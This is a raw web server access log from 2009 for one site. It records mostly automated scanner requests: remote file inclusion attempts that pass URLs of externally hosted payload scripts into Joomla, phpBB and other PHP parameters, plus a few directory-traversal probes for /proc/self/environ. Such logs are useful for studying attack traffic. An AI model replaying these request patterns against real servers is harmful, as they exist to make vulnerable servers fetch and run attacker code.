89.223.3.98 - - [05/Jul/2009:08:12:34 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
89.223.3.98 - - [05/Jul/2009:08:12:34 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
82.194.87.219 - - [05/Jul/2009:08:15:16 -0700] "GET /logs//index.php?sayfa=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.thepointers.net"
82.194.87.219 - - [05/Jul/2009:08:17:20 -0700] "GET /logs///common/db.php?commonpath=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "thepointers.net"
84.17.129.100 - - [05/Jul/2009:08:19:09 -0700] "GET /logs/access.log/?sourcedir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
84.17.129.100 - - [05/Jul/2009:08:19:09 -0700] "GET /?sourcedir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.thepointers.net"
84.17.129.100 - - [05/Jul/2009:08:19:09 -0700] "GET /logs/?sourcedir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 200 2368 "-" "libwww-perl/5.79" "www.thepointers.net"
82.146.58.249 - - [05/Jul/2009:08:21:56 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.thepointers.net"
82.146.59.116 - - [05/Jul/2009:08:21:56 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.thepointers.net"
66.232.143.238 - - [05/Jul/2009:08:23:30 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
80.248.208.177 - - [05/Jul/2009:08:24:09 -0700] "GET /logs/access.log/?sourcedir=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
80.248.208.177 - - [05/Jul/2009:08:25:44 -0700] "GET /logs/access.log/?sourcedir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
80.248.208.177 - - [05/Jul/2009:08:25:44 -0700] "GET /?sourcedir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.thepointers.net"
80.248.208.177 - - [05/Jul/2009:08:25:45 -0700] "GET /logs/?sourcedir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 200 2368 "-" "libwww-perl/5.805" "www.thepointers.net"
66.232.143.238 - - [05/Jul/2009:08:27:34 -0700] "GET /?sIncPath=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.thepointers.net"
66.11.230.36 - - [05/Jul/2009:08:28:07 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
66.11.230.36 - - [05/Jul/2009:08:28:07 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
66.11.230.36 - - [05/Jul/2009:08:28:07 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
85.214.147.206 - - [05/Jul/2009:08:29:10 -0700] "GET /logs/access_080925.log%20%20//?DOCUMENT_ROOT=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
85.214.147.206 - - [05/Jul/2009:08:29:10 -0700] "GET /?DOCUMENT_ROOT=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.thepointers.net"
85.214.147.206 - - [05/Jul/2009:08:29:10 -0700] "GET /logs//?DOCUMENT_ROOT=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "www.thepointers.net"
85.214.147.206 - - [05/Jul/2009:08:29:42 -0700] "GET /logs/access.log%20%20//?DOCUMENT_ROOT=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
82.194.87.219 - - [05/Jul/2009:08:31:31 -0700] "GET /logs//index.php?sayfa=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "thepointers.net"
82.194.87.219 - - [05/Jul/2009:08:32:32 -0700] "GET /logs//index.php?sayfa=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "thepointers.net"
89.223.3.98 - - [05/Jul/2009:08:32:50 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
89.223.3.98 - - [05/Jul/2009:08:32:50 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
89.223.3.98 - - [05/Jul/2009:08:32:50 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
85.214.147.206 - - [05/Jul/2009:08:33:21 -0700] "GET /logs/access.log//?DOCUMENT_ROOT=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
84.17.129.100 - - [05/Jul/2009:08:34:31 -0700] "GET /logs/access_080925.log/?sourcedir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
82.194.87.219 - - [05/Jul/2009:08:36:20 -0700] "GET /logs///ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.thepointers.net"
89.223.3.98 - - [05/Jul/2009:08:40:09 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
82.194.87.219 - - [05/Jul/2009:08:40:14 -0700] "GET /logs///skin/zero_vote/error.php?dir=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.thepointers.net"
82.194.87.219 - - [05/Jul/2009:08:40:39 -0700] "GET /logs///skin/zero_vote/error.php?dir=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.thepointers.net"
84.17.129.100 - - [05/Jul/2009:08:43:40 -0700] "GET /?sourcedir=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.thepointers.net"
84.17.129.100 - - [05/Jul/2009:08:43:40 -0700] "GET /logs/?sourcedir=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "www.thepointers.net"
84.17.129.100 - - [05/Jul/2009:08:43:40 -0700] "GET /logs/access.log%20%20/?sourcedir=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
84.17.129.100 - - [05/Jul/2009:08:45:45 -0700] "GET /logs/access_080925.log%20%20/?sourcedir=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
61.78.62.84 - - [05/Jul/2009:08:45:53 -0700] "GET /skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
61.78.62.84 - - [05/Jul/2009:08:45:53 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
61.78.62.84 - - [05/Jul/2009:08:45:54 -0700] "GET /logs/access_080925.log%20%20//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
66.232.143.238 - - [05/Jul/2009:08:46:36 -0700] "GET /logs/access_090128.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
66.232.143.238 - - [05/Jul/2009:08:46:37 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
66.232.143.238 - - [05/Jul/2009:08:46:37 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
61.78.62.84 - - [05/Jul/2009:08:49:08 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
61.78.62.84 - - [05/Jul/2009:08:49:09 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
61.78.62.84 - - [05/Jul/2009:08:49:09 -0700] "GET /skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
61.78.62.84 - - [05/Jul/2009:08:49:33 -0700] "GET /skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
61.78.62.84 - - [05/Jul/2009:08:49:33 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
61.78.62.84 - - [05/Jul/2009:08:49:33 -0700] "GET /logs/access_081222.log//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
61.78.62.84 - - [05/Jul/2009:08:49:42 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
61.78.62.84 - - [05/Jul/2009:08:49:42 -0700] "GET /skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
61.78.62.84 - - [05/Jul/2009:08:49:42 -0700] "GET /logs/access_081222.log%20%20//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
61.78.62.84 - - [05/Jul/2009:08:49:52 -0700] "GET /skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
61.78.62.84 - - [05/Jul/2009:08:49:53 -0700] "GET /logs/access_081222.log//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
61.78.62.84 - - [05/Jul/2009:08:49:53 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
66.232.143.238 - - [05/Jul/2009:08:50:19 -0700] "GET /?sIncPath=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.thepointers.net"
61.78.62.84 - - [05/Jul/2009:08:50:20 -0700] "GET /skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
61.78.62.84 - - [05/Jul/2009:08:50:20 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
61.78.62.84 - - [05/Jul/2009:08:50:21 -0700] "GET /logs/access_081222.log%20%20//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
61.78.62.84 - - [05/Jul/2009:08:50:29 -0700] "GET /logs/access_080925.log%20%20//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:08:51:17 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:08:51:17 -0700] "GET /logs/access_090112.log/admin/business_inc/saveserver.php?thisdir=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:08:51:17 -0700] "GET /logs/admin/business_inc/saveserver.php?thisdir=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:08:51:25 -0700] "GET /logs/access_090408.log/admin/business_inc/saveserver.php?thisdir=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
61.78.62.84 - - [05/Jul/2009:08:51:54 -0700] "GET /logs/access_090112.log//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:08:52:03 -0700] "GET /logs/access_090112.log%20/admin/business_inc/saveserver.php?thisdir=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
61.78.62.84 - - [05/Jul/2009:08:52:55 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
61.78.62.84 - - [05/Jul/2009:08:52:55 -0700] "GET /skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
61.78.62.84 - - [05/Jul/2009:08:52:55 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
200.226.134.29 - - [05/Jul/2009:08:52:59 -0700] "GET /logs/access_080925.log/e404.php?DOCUMENT_ROOT=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.thepointers.net"
200.226.134.29 - - [05/Jul/2009:08:53:00 -0700] "GET /logs/access_080925.log/e404.php?DOCUMENT_ROOT=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.thepointers.net"
200.226.134.29 - - [05/Jul/2009:08:53:00 -0700] "GET /e404.php?DOCUMENT_ROOT=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.thepointers.net"
200.226.134.29 - - [05/Jul/2009:08:53:00 -0700] "GET /e404.php?DOCUMENT_ROOT=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.thepointers.net"
200.226.134.29 - - [05/Jul/2009:08:53:01 -0700] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.thepointers.net"
200.226.134.29 - - [05/Jul/2009:08:53:01 -0700] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:08:53:16 -0700] "GET /logs/access_080925.log/admin/classes/TplLoad.php?full_path_to_public_program=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:08:53:19 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:08:53:19 -0700] "GET /logs/admin/classes/TplLoad.php?full_path_to_public_program=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:08:54:36 -0700] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:08:54:37 -0700] "GET /logs/access.log/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:08:54:37 -0700] "GET /logs/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
98.166.244.163 - - [05/Jul/2009:08:55:17 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.thepointers.net"
98.166.244.163 - - [05/Jul/2009:08:55:17 -0700] "GET / HTTP/1.1" 200 779 "http://www.getting2goal.com/links/links.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:08:55:58 -0700] "GET /logs/includes/functions_admin.php?phpbb_root_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:08:56:01 -0700] "GET /includes/functions_admin.php?phpbb_root_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:08:56:03 -0700] "GET /logs/access.log/includes/functions_admin.php?phpbb_root_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
119.201.245.60 - - [05/Jul/2009:08:56:58 -0700] "GET /logs/access.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.anarchitetti.it/site/uploads/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
119.201.245.60 - - [05/Jul/2009:08:56:58 -0700] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.anarchitetti.it/site/uploads/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
119.201.245.60 - - [05/Jul/2009:08:56:58 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.anarchitetti.it/site/uploads/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
200.226.134.29 - - [05/Jul/2009:08:57:11 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "thepointers.net"
200.226.134.29 - - [05/Jul/2009:08:57:11 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "thepointers.net"
200.226.134.29 - - [05/Jul/2009:08:57:12 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "thepointers.net"
200.226.134.29 - - [05/Jul/2009:08:57:12 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "thepointers.net"
200.226.134.29 - - [05/Jul/2009:08:57:12 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "thepointers.net"
200.226.134.29 - - [05/Jul/2009:08:57:12 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "thepointers.net"
200.226.134.29 - - [05/Jul/2009:09:00:50 -0700] "GET /logs/access.log/e404.php?DOCUMENT_ROOT=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.thepointers.net"
200.226.134.29 - - [05/Jul/2009:09:00:50 -0700] "GET /logs/access.log/e404.php?DOCUMENT_ROOT=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.thepointers.net"
62.58.32.74 - - [05/Jul/2009:09:01:09 -0700] "GET /logs/access_080925.log/e404.php?DOCUMENT_ROOT=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
62.58.32.74 - - [05/Jul/2009:09:01:10 -0700] "GET /e404.php?DOCUMENT_ROOT=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
62.58.32.74 - - [05/Jul/2009:09:01:10 -0700] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
119.201.245.60 - - [05/Jul/2009:09:01:58 -0700] "GET /logs/access.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.anarchitetti.it/site/uploads/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
119.201.245.60 - - [05/Jul/2009:09:01:58 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.anarchitetti.it/site/uploads/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
119.201.245.60 - - [05/Jul/2009:09:01:58 -0700] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.anarchitetti.it/site/uploads/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
66.232.143.238 - - [05/Jul/2009:09:03:15 -0700] "GET /logs/access.log/?sIncPath=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
66.232.143.238 - - [05/Jul/2009:09:03:16 -0700] "GET /?sIncPath=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.thepointers.net"
66.232.143.238 - - [05/Jul/2009:09:03:16 -0700] "GET /logs/?sIncPath=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 200 2368 "-" "libwww-perl/5.805" "www.thepointers.net"
62.58.32.74 - - [05/Jul/2009:09:05:16 -0700] "GET /logs/access.log/e404.php?DOCUMENT_ROOT=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "thepointers.net"
62.58.32.74 - - [05/Jul/2009:09:05:16 -0700] "GET /e404.php?DOCUMENT_ROOT=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "thepointers.net"
62.58.32.74 - - [05/Jul/2009:09:05:16 -0700] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "thepointers.net"
94.229.66.202 - - [05/Jul/2009:09:07:31 -0700] "GET /logs/access_081016.log/index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:09:07:31 -0700] "GET /logs/index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:09:07:36 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
84.17.129.100 - - [05/Jul/2009:09:15:01 -0700] "GET /logs/access.log/?sourcedir=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
124.0.55.226 - - [05/Jul/2009:09:16:22 -0700] "GET /logs/port.php?content=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.thepointers.net"
124.0.55.226 - - [05/Jul/2009:09:16:23 -0700] "GET /port.php?content=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.thepointers.net"
124.0.55.226 - - [05/Jul/2009:09:16:28 -0700] "GET /logs/port.php?content=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.thepointers.net"
124.0.55.226 - - [05/Jul/2009:09:16:29 -0700] "GET /port.php?content=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:09:17:05 -0700] "GET /logs/access.log%20/index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:09:17:06 -0700] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:09:17:06 -0700] "GET /logs/index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
